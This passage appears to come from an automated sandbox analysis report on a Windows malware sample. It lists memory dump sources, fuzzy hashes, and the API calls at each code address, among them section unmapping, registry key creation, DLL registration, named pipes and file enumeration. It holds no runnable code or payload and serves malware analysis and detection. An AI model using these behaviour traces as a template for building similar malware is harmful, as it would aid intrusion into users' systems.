  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
